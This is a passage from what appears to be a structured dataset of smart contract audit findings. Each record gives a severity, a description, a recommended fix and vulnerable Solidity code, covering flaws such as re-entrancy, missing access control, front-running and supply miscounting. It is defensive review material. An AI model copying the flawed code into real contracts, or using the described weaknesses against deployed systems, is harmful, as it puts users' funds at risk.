ROUND\\_HALF\\_UP rule helper. 
0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, \"roundHalfUp only supports y > 0\");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\nчWe have verified the current code-base and the callers for `roundHalfUp` are correctly finishing the rounding step. However, it is recommended to finish the rounding within the method or document this behavior to prevent errors caused by code that falsely assumes that the returned value finished rounding.чч```\\n// ROUND\\_HALF\\_UP rule helper. 0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, \"roundHalfUp only supports y > 0\");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\n -LibMath/LibOrder - unused named return valueчlowчThe following methods declare a named return value but explicitly return a value instead. The named return value is not used.\\n`LibMathSigned.min()`\\n`LibMathSigned.max()`\\n`LibMathUnsigned.min()`\\n`LibMathUnsigned.max()`\\n`LibOrder.getOrderHash()`\\n`LibOrder.hashOrder()`\\n```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n\\n```\\nfunction min(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x >= y ? 
x : y;\\n}\\n```\\n\\n```\\nfunction getOrderHash(Order memory order) internal pure returns (bytes32 orderHash) {\\n orderHash = LibEIP712.hashEIP712Message(hashOrder(order));\\n return orderHash;\\n}\\n```\\n\\n```\\nfunction hashOrder(Order memory order) internal pure returns (bytes32 result) {\\n bytes32 orderType = EIP712\\_ORDER\\_TYPE;\\n // solium-disable-next-line security/no-inline-assembly\\n assembly {\\n let start := sub(order, 32)\\n let tmp := mload(start)\\n mstore(start, orderType)\\n result := keccak256(start, 224)\\n mstore(start, tmp)\\n }\\n return result;\\n}\\n```\\nчRemove the named return value and explicitly return the value.чч```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n -Commented code exists in BMathчlowч```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n\\n```\\nuint normalizedWeight = bdiv(tokenWeightOut, totalWeight);\\n// charge exit fee on the pool token side\\n// pAiAfterExitFee = pAi\\*(1-exitFee)\\nuint poolAmountInAfterExitFee = bmul(poolAmountIn, bsub(BONE, EXIT\\_FEE));\\n```\\n\\nAnd many more examples.чRemove the commented code, or address them properly. 
If the code is related to exit fee, which is considered to be 0 in this version, this style should be persistent in other contracts as well.чч```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n -Max weight requirement in rebind is inaccurateчlowч`BPool.rebind` enforces `MIN_WEIGHT` and `MAX_WEIGHT` bounds on the passed-in `denorm` value:\\n```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, \"ERR\\_NOT\\_CONTROLLER\");\\n require(\\_records[token].bound, \"ERR\\_NOT\\_BOUND\");\\n require(!\\_finalized, \"ERR\\_IS\\_FINALIZED\");\\n\\n require(denorm >= MIN\\_WEIGHT, \"ERR\\_MIN\\_WEIGHT\");\\n require(denorm <= MAX\\_WEIGHT, \"ERR\\_MAX\\_WEIGHT\");\\n require(balance >= MIN\\_BALANCE, \"ERR\\_MIN\\_BALANCE\");\\n```\\n\\n`MIN_WEIGHT` is `1 BONE`, and `MAX_WEIGHT` is `50 BONE`.\\nThough a token weight of `50 BONE` may make sense in a single-token system, `BPool` is intended to be used with two to eight tokens. 
The sum of the weights of all tokens must not be greater than `50 BONE`.\\nThis implies that a weight of `50 BONE` for any single token is incorrect, given that at least one other token must be present.ч`MAX_WEIGHT` for any single token should be `MAX_WEIGHT` - MIN_WEIGHT, or `49 BONE`.чч```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, \"ERR\\_NOT\\_CONTROLLER\");\\n require(\\_records[token].bound, \"ERR\\_NOT\\_BOUND\");\\n require(!\\_finalized, \"ERR\\_IS\\_FINALIZED\");\\n\\n require(denorm >= MIN\\_WEIGHT, \"ERR\\_MIN\\_WEIGHT\");\\n require(denorm <= MAX\\_WEIGHT, \"ERR\\_MAX\\_WEIGHT\");\\n require(balance >= MIN\\_BALANCE, \"ERR\\_MIN\\_BALANCE\");\\n```\\n -Test code present in the code baseчmediumчTest code are present in the code base. This is mainly a reminder to fix those before production.\\n`rescuerAddress` and `freezerAddress` are not even in the function arguments.\\n```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\nчResolution\\nFixed in lukso-network/[email protected]edb880c.\\nMake sure all the variable assignments are ready for production before deployment to production.чч```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\n -frozenPeriod is subtracted twice for calculating the current priceчmediumчIf the contract had been frozen, the current stage price will calculate the price by subtracting the `frozenPeriod` twice and result in wrong calculation.\\n`getCurrentBlockNumber()` subtracts `frozenPeriod` once, and then `getStageAtBlock()` will also subtract 
the same number again.\\n```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n\\n```\\nfunction getCurrentBlockNumber() public view returns (uint256) {\\n return uint256(block.number)\\n .sub(frozenPeriod); // make sure we deduct any frozenPeriod from calculations\\n}\\n```\\n\\n```\\nfunction getStageAtBlock(uint256 \\_blockNumber) public view returns (uint8) {\\n\\n uint256 blockNumber = \\_blockNumber.sub(frozenPeriod); // adjust the block by the frozen period\\n```\\nчResolution\\nFound in parallel to the audit team and has been mitigated in lukso-network/[email protected]ebc4bce . The issue was further simplified by adding `getCurrentEffectiveBlockNumber()` in lukso-network/[email protected]e4c9ed5 to remove ambiguity when calculating current block number.\\nMake sure `frozenPeriod` calculation is done correctly. It could be solved by renaming `getCurrentBlockNumber()` to reflect the calculation done inside the function.\\ne.g. :\\n`getCurrentBlockNumber()` : gets current block number\\n`getCurrentEffectiveBlockNumber()` : calculates the effective block number deducting `frozenPeriod`чч```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n -Gold order size should be limitedчhighчWhen a user submits an order to buy gold cards, it's possible to buy a huge amount of cards. 
`_commit` function uses less gas than `mineGolds`, which means that the user can successfully commit to buying this amount of cards and when it's time to collect them, `mineGolds` function may run out of gas because it iterates over all card IDs and mints them:\\n```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, \"\");\\n```\\nчResolution\\nAddressed in horizon-games/SkyWeaver-contracts#9 by adding a limit for cold cards amount in one order.\\nLimit a maximum gold card amount in one order.чч```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, \"\");\\n```\\n -Price and refund changes may cause failuresчhighчPrice and refund for gold cards are used in 3 different places: commit, mint, refund.\\nWeave tokens spent during the commit phase\\n```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n\\nbut they are burned `rngDelay` blocks after\\n```\\n// Burn the non-refundable weave\\nuint256 weave\\_to\\_burn = (\\_order.cardAmount.mul(goldPrice)).sub(\\_order.cardAmount.mul(goldRefund));\\nweaveContract.burn(weaveID, weave\\_to\\_burn);\\n```\\n\\nIf the price is increased between these transactions, mining cards may fail because it should burn more `weave` tokens than there are tokens in the smart contract. 
Even if there are enough tokens during this particular transaction, someone may fail to melt a gold card later.\\nIf the price is decreased, some `weave` tokens will be stuck in the contract forever without being burned.чStore `goldPrice` and `goldRefund` in `GoldOrder`.чч```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n -Re-entrancy attack allows to buy EternalHeroes cheaperчhighчWhen buying eternal heroes in `_buy` function of `EternalHeroesFactory` contract, a buyer can do re-entrancy before items are minted.\\n```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, \"\");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, \"\");\\n```\\n\\nSince price should increase after every `N` items are minted, it's possible to buy more items with the old price.чAdd re-entrancy protection or mint items before sending the refund.чч```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, \"\");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, \"\");\\n```\\n -Supply limitation misbehaviorsчmediumчIn `SWSupplyManager` contract, the `owner` can limit supply for any token ID by setting maxSupply:\\n```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, \"SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH\");\\n\\n
// Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n \"SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY\"\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n\\nThe problem is that you can set `maxSupply` that is lower than `currentSupply`, which would be an unexpected state to have.\\nAlso, if some tokens are burned, their `currentSupply` is not decreasing:\\n```\\nfunction burn(\\n uint256 \\_id,\\n uint256 \\_amount)\\n external\\n{\\n \\_burn(msg.sender, \\_id, \\_amount);\\n}\\n```\\n\\nThis unexpected behaviour may lead to burning all of the tokens without being able to mint more.чProperly track `currentSupply` by modifying it in `burn` function. Consider having a following restriction `require(_newMaxSupplies[i] > currentSupply[_ids[i]])` in `setMaxSupplies` function.чч```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, \"SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH\");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n \"SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY\"\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n -importScore() in IexecMaintenanceDelegate can be used to wrongfully reset worker scores AcknowledgedчmediumчThe import of worker scores from the previous PoCo system deployed on chain is made to be asynchronous. 
And, even though the pull pattern usually makes a system much more resilient, in this case, it opens up the possibility for an attack that undermines the trust-based game-theoretical balance the PoCo system relies on. As can be seen in the following function:\\n```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], \"score-already-imported\");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n\\nA motivated attacker could attack the system providing bogus results for computation tasks therefore reducing his own reputation (mirrored by the low worker score that would follow).\\nAfter the fact, the attacker could reset its score to the previous high value attained in the previously deployed PoCo system (v3) and undo all the wrongdoings he had done at no reputational cost.чResolution\\nUpdate from the iExec team:\\nIn order to perform this attack, one would first have to gain reputation on the new version, and lose it. They would then be able to restore its score from the old version.\\nWe feel the risk is acceptable for a few reasons:\\nIt can only be done once per worker\\nConsidering the score dynamics discussed in the “Trust in the PoCo” document, it is more interesting for a worker to import its reputation in the beginning rather then creating a new one, since bad contributions only remove part of the reputation\\nOnly a handful of workers have reputation in the old system (180), and their score is low (average 7, max 22)\\nWe might force the import all 180 workers with reputation >0. A script to identify the relevant addresses is already available.\\nCheck that each worker interacting with the PoCo system has already imported his score. 
Otherwise import it synchronously with a call at the time of their first interaction.чч```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], \"score-already-imported\");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n -Domain separator in iExecMaintenanceDelegate has a wrong version field AcknowledgedчmediumчThe domain separator used to comply with the EIP712 standard in `iExecMaintenanceDelegate` has a wrong version field.\\n```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: \"iExecODB\"\\n , version: \"3.0-alpha\"\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n\\nIn the above snippet we can see the code is still using the version field from an old version of the PoCo protocol, `\"3.0-alpha\"`.чResolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]ebee370\\nChange the version field to: `\"5.0-alpha\"`чч```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: \"iExecODB\"\\n , version: \"3.0-alpha\"\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n -The updateContract() method in ERC1538UpdateDelegate is incorrectly implementedчlowчThe `updateContract()` method in `ERC1538UpdateDelegate` does not behave as intended for some specific streams of bytes (meant to be parsed as function signatures).\\nThe mentioned function takes as input, among other things, a `string` (which is, canonically, a dynamically-sized `bytes` array) and tries to parse it as a conjunction of function signatures.\\nAs is evident in:\\n```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n\\nInside the function, `;` is being used as a “reserved” 
character, serving as a delimiter between each function signature.\\nHowever, if two semicolons are used in succession, the second one will not be checked and will be made part of the function signature being sent into the `_setFunc()` method.\\nExample of faulty input\\n`someFunc;;someOtherFuncWithSemiColon;`чResolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]e6be083\\nReplace the line that increases the `pos` counter at the end of the function:\\n```\\nstart = ++pos;\\n```\\n\\nWith this line of code:\\n`start = pos + 1;`чч```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n -TokenStaking.recoverStake allows instant stake undelegationчhighч`TokenStaking.recoverStake` is used to recover stake that has been designated to be undelegated. It contains a single check to ensure that the undelegation period has passed:\\n```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n \"Can not recover stake before undelegation period is over.\"\\n );\\n```\\n\\nHowever, if an undelegation period is never set, this will always return true, allowing any operator to instantly undelegate stake at any time.чRequire that the undelegation period is nonzero before allowing an operator to recover stake.чч```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n \"Can not recover stake before undelegation period is over.\"\\n );\\n```\\n -tbtc - No access control in TBTCSystem.requestNewKeepчhighч`TBTCSystem.requestNewKeep` is used by each new `Deposit` contract on creation. It calls `BondedECDSAKeepFactory.openKeep`, which sets the `Deposit` contract as the “owner,” a permissioned role within the created keep. 
`openKeep` also automatically allocates bonds from members registered to the application. The “application” from which member bonds are allocated is the tbtc system itself.\\nBecause `requestNewKeep` has no access controls, anyone can request that a keep be opened with `msg.sender` as the “owner,” and arbitrary signing threshold values:\\n```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n\\nGiven that the owner of a keep is able to seize signer bonds, close the keep, and more, having control of this role could be detrimental to group members.чResolution\\nIssue addressed in keep-network/tbtc#514. Each call to `requestNewKeep` makes a check that `uint(msg.sender)` is an existing `TBTCDepositToken`. 
Because these tokens are only minted in `DepositFactory`, `msg.sender` would have to be one of the cloned deposit contracts.\\nAdd access control to `requestNewKeep`, so that it can only be called as a part of the `Deposit` creation and initialization process.чч```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n -Unpredictable behavior due to front running or general bad timingчhighчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nSystem Parameters\\nThe owner of the `TBTCSystem` contract can change system parameters at any time with changes taking effect immediately.\\n`setSignerFeeDivisor` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setLotSizes` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setCollateralizationThresholds` - stored in the deposit contract when creating a new deposit. 
emits an event.\\nThis also opens up an opportunity for malicious owner to:\\ninterfere with other participants deposit creation attempts (front-running transactions)\\ncraft a series of transactions that allow the owner to set parameters that are more beneficial to them, then create a deposit and reset the parameters to the systems' initial settings.\\n```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, \"Signer fee divisor must be greater than 9, for a signer fee that is <= 10%.\");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n\\nUpgradables\\nThe proxy pattern used in many places throughout the system allows the operator to set a new implementation which takes effect immediately.\\n```\\n/\\*\\*\\n \\* @dev Upgrade current implementation.\\n \\* @param \\_implementation Address of the new implementation contract.\\n \\*/\\nfunction upgradeTo(address \\_implementation)\\n public\\n onlyOwner\\n{\\n address currentImplementation = implementation();\\n require(\\_implementation != address(0), \"Implementation address can't be zero.\");\\n require(\\_implementation != currentImplementation, \"Implementation address must be different from the current one.\");\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\n```\\n/// @notice Upgrades the current vendor implementation.\\n/// @param \\_implementation Address of the new vendor implementation contract.\\nfunction upgradeTo(address \\_implementation) public onlyOwner {\\n address currentImplementation = implementation();\\n require(\\n \\_implementation != address(0),\\n \"Implementation address can't be zero.\"\\n );\\n require(\\n \\_implementation != currentImplementation,\\n \"Implementation address must be different from the current 
one.\"\\n );\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\nRegistry\\n```\\nfunction registerFactory(address payable \\_factory) external onlyOperatorContractUpgrader {\\n require(\\_factory != address(0), \"Incorrect factory address\");\\n require(\\n registry.isApprovedOperatorContract(\\_factory),\\n \"Factory contract is not approved\"\\n );\\n keepFactory = \\_factory;\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, \"Signer fee divisor must be greater than 9, for a signer fee that is <= 10%.\");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n -keep-core - reportRelayEntryTimeout creates an incentive for nodes to race for rewards potentially wasting gas and it creates an opportunity for front-runningчhighчThe incentive on `reportRelayEntryTimeout` for being rewarded with 5% of the seized amount creates an incentive to call the method but might also kick off a race for front-running this call. 
This method is being called from the keep node which is unlikely to adjust the gasPrice and might always lose the race against a front-running bot collecting rewards for all timeouts and fraud proofs (issue 5.7)\\n```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), \"Entry did not time out\");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\nчMake sure that `reportRelayEntryTimeout` throws as early as possible if the group was previously terminated (isGroupTerminated) to avoid that keep-nodes spend gas on a call that will fail. Depending on the reward for calling out the timeout this might create a front-running opportunity that cannot be resolved.чч```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. 
As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), \"Entry did not time out\");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\n -keep-core - reportUnauthorizedSigning fraud proof is not bound to reporter and can be front-runчhighчAn attacker can monitor `reportUnauthorizedSigning()` for fraud reports and attempt to front-run the original call in an effort to be the first one reporting the fraud and be rewarded 5% of the total seized amount.\\n```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. 
The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\nчRequire the reporter to include `msg.sender` in the signature proving the fraud or implement a two-step commit/reveal scheme to counter front-running opportunities by forcing a reporter to secretly commit the fraud parameters in one block and reveal them in another.чч```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\n -keep-core - operator contracts disabled via panic button can be re-enabled by RegistryKeeperчhighчThe Registry contract defines three administrative accounts: `Governance`, `registryKeeper`, and `panicButton`. All permissions are initially assigned to the deployer when the contract is created. The account acting like a super-admin, being allowed to re-assign administrative accounts - is `Governance`. 
`registryKeeper` is a lower privileged account maintaining the registry and `panicButton` is an emergency account that can disable operator contracts.\\nThe keep specification states the following:\\nPanic Button The Panic Button can disable malicious or malfunctioning contracts that have been previously approved by the Registry Keeper. When a contract is disabled by the Panic Button, its status on the registry changes to reflect this, and it becomes ineligible to penalize operators. Contracts disabled by the Panic Button can not be reactivated. The Panic Button can be rekeyed by Governance.\\nIt is assumed that the permissions are `Governance` > `panicButton` > `registryKeeper`, meaning that `panicButton` should be able to overrule `registryKeeper`, while `registryKeeper` cannot overrule `panicButton`.\\nWith the current implementation of the Registry the `registryKeeper` account can re-enable an operator contract that has previously been disabled by the `panicButton` account.\\nWe would also like to note the following:\\nThe contract should use enums instead of integer literals when working with contract states.\\nChanges to the contract take effect immediately, allowing an administrative account to selectively front-run calls to the Registry ACL and interfere with user activity.\\nThe operator contract state can be set to the current value without raising an error.\\nThe panic button can be called for operator contracts that are not yet active.\\n```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\nчThe keep specification states:\\nThe Panic Button can be used to set the status of an APPROVED contract to DISABLED. 
Operator Contracts disabled with the Panic Button cannot be re-enabled, and disabled contracts may not punish operators nor be selected by service contracts to perform work.\\nAll three accounts are typically trusted. We recommend requiring the `Governance` or `panicButton` accounts to reset the contract operator state before `registryKeeper` can change the state or disallow re-enabling of disabled operator contracts as stated in the specification.чч```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\n -tbtc - State transitions are not always enforcedчhighчA deposit follows a complex state-machine that makes sure it is correctly funded before `TBTC` Tokens are minted. The deposit lifecycle starts with a set of states modeling a funding flow that - if successful - ultimately leads to the deposit being active, meaning that corresponding `TBTC` tokens exist for the deposits. A redemption flow allows to redeem `TBTC` for `BTC` and a liquidation flow handles fraud and abort conditions. Fraud cases in the funding flow are handled separately.\\nState transitions from one deposit state to another require someone calling the corresponding transition method on the deposit and actually spend gas on it. The incentive to call a transition varies and is analyzed in more detail in the security-specification section of this report.\\nThis issue assumes that participants are not always pushing forward through the state machine as soon as a new state becomes available, opening up the possibility of having multiple state transitions being a valid option for a deposit (e.g. 
